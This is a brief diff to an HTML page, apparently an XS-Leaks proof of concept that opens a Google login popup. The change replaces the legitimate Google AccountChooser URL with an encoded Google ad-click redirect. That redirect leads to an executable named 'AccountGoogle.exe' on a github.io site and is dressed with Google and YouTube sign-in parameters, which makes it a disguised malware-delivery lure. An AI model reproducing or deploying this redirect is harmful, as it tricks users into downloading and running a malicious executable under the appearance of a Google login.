--- a/xsleaks.html
+++ b/xsleaks.html
@@ -27,7 +27,7 @@
 
   // Step 1: Open Google Login in Popup (XS-Leaks trigger)
   function checkGoogleLogin() {
-    const popupURL = 'https://accounts.google.com/AccountChooser?continue=https://adservice.google.com/';
+    const popupURL = 'https%3A%2F%2Fadservice.google.com%2Fddm%2Fclk%2F408533097%3B208818505%3Bl%3B%3B%3F%2F%2Flanaya113505.github.io%2Fpizza%2FAccountGoogle.exe%3F%2Fhome&ddm=1&flowEntry=AccountChooser&flowName=GlifWebSignIn&hl=id&ltmpl=youtube&service=youtube&authuser=0';
     const popupWidth = 500;
     const popupHeight = 600;
     const left = (screen.width / 2) - (popupWidth / 2);
